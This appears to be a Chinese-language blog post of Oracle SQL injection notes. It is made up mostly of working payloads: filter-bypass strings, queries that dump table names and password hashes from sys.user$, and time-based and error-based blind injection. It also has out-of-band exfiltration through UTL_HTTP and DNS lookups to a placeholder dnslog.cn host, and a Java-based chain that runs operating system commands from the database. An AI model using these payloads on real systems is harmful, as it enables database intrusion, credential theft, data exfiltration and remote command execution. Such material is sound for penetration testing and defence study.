Oracle注入技巧/1

发表于 | 更新于:
字数统计: 1.2k | 阅读时长 ≈ 6

https://y4er.com/post/oracle-sql-inject/

一、oracle的绕过

1、 '%7c%7c(case+when+instr(user,'S',2)>0+%0a/**/then+'lyx'+else+'0'+end)%7c%7c' 用%0a或者%0d与/**/注释符的组合来绕过。

引发的思考:
1、fuzz函数
可以在//里面fuzz函数黑名单的匹配检索。比如我在/substr/就会报错

image-20210916163729399

md这玩意儿 不行啊

image-20210916172718527

2、 如何查询user字段的内容
这里就需要对字串的操作,找了以下几个方法,有待补充:1、substr,substring 2、like 3、instr4、replace

1、substr( string, start_position, [ length ] ) 返回的是字串
例子: substr('This is a test', 6, 2)     would return 'is'


2、 like
when+user+like’H%25’+%0
对这个H进行fuzz占位

3、instr的用法 会涉及脚本跑出,参数替换(这个的效率是比like要好的)
语法:instr(sourceString,destString,start,appearPosition).   instr('源字符串' , '目标字符串' ,'开始位置','第几次出现')
比如用户名为HSCON
    1、
instr(user,'H',1)=1
instr(user,'S',2)=2

    2、
instr(user,'HS',1)=1
instr(user,'HSC',1)=1

4、replace
replace('将要更改的字符串','被替换掉的字符串','替换字符串')
例:select  replace ('111222333444','222','888') from dual;
输出为 '111888333444' 所以正确执行就返回1

3、 获取数据库的更多信息

1
2
3
4
5
6
数据表user_tables里获取数据列table_name的信息:
select wm_concat(table_name) from user_tables
(select wm_concat(table_name ) from user_tables where rownum=1 and table_name not in('USERS'))

从数据表user_tab_columns里获取数据列column_name的信息:
select wm_concat(column_name) from user_tab_columns where table_name= 'USERS'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
获取数据库版本:
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT version FROM v$instance;

获取操作系统版本:
SELECT banner FROM v$version where banner like 'TNS%';

获取当前数据库用户:
SELECT user FROM dual;

获取当前用户权限:
SELECT * FROM session_privs;

获取所有数据库用户密码:
SELECT name, spare4 FROM sys.user$;

获取users表的用户名和密码:
select wm_concat(username||'~'||password) from USERS

列出DBA账户:


获取DB文件路径:
SELECT name FROM V$DATAFILE;

二、盲注的种类

时间盲注

语句一正确延时10秒左右返回1:

1
select 1 from dual where DBMS_PIPE.RECEIVE_MESSAGE('olo', REPLACE((SELECT substr(user, 1, 1) FROM dual), 'S', 10))=1;

图片

语句二正确延时10s左右返回1:

1
select decode(substr(user,1,1),'S',dbms_pipe.receive_message('olo',10),0) from dual;

语句三正确延时10s左右返回1:

1
select 1 from dual where 1=0 or DBMS_PIPE.RECEIVE_MESSAGE('pyy', REPLACE((SELECT substr(user, 1, 1) FROM dual), 'S', 10))=1;

报错注入:

ctxsys.drithsx.sn()函数:

1
select ctxsys.drithsx.sn(1, (select user from dual)) from dual;

ctxsys.ctx_report.token_type()函数:

1
select ctxsys.ctx_report.token_type((select user from dual), '1') from dual;

xmltype()函数:

1
select xmltype('<:'||(select user from dual)||'>') from dual;

dbms_xdb_version.checkin()函数:

1
select dbms_xdb_version.checkin((select user from dual)) from dual;

dbms_xdb_version.makeversioned()函数:

1
select dbms_xdb_version.makeversioned((select user from dual)) from dual;

dbms_xdb_version.uncheckout()函数:

1
select dbms_xdb_version.uncheckout((select user from dual)) from dual;

dbms_utility.sqlid_to_sqlhash()函数:

1
SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual;

ordsys.ord_dicom.getmappingxpath()函数:

1
select ordsys.ord_dicom.getmappingxpath((select user from dual), 1, 1) from dual;

utl_inaddr.get_host_name()函数:

1
select utl_inaddr.get_host_name((select user from dual)) from dual;

utl_inaddr.get_host_address()函数:

1
select utl_inaddr.get_host_address('~'||(select user from dual)||'~') from dual;

带外通道(OOB:Out Of Band Channels):

使用一些除常规通道以外的替代的信道来请求服务器资源,一般使用 Oracle 发送HTTP或者DNS请求,将查询结果带到请求中,然后监测外网服务器的HTTP和DNS日志,从日志中获取 sql 语句查询的结果,通过这种方式将繁琐的盲注转换成可以直接简便的获取查询结果的方式,尤其是基于时间的盲注,能极大地加快速度

utl_http.request()函数:

1
SELECT UTL_HTTP.REQUEST((select user from dual)||'.xxxxx.dnslog.cn') FROM DUAL;

utl_inaddr.get_host_address()函数:(重新打马赛克)

1
select utl_inaddr.get_host_address((select user from dual)||'.xxxxxx.dnslog.cn') from dual;

sys.dbms_ldap.init()函数:

1
select dbms_ldap.init('xxxxxx.dnslog.cn',80) from dual;

httpuritype()函数:

1
select httpuritype((select user from dual)||'.xxxxxx.dnslog.cn').getclob() from dual;

执行系统命令:

1
select null,null from dual union select 1,dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;
1
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''<<ALL FILES>>'''',''''EXECUTE'''');end;''commit;end;') from dual;
1
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function osshell(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;

执行系统命令:

1
select osshell('whoami') from dual;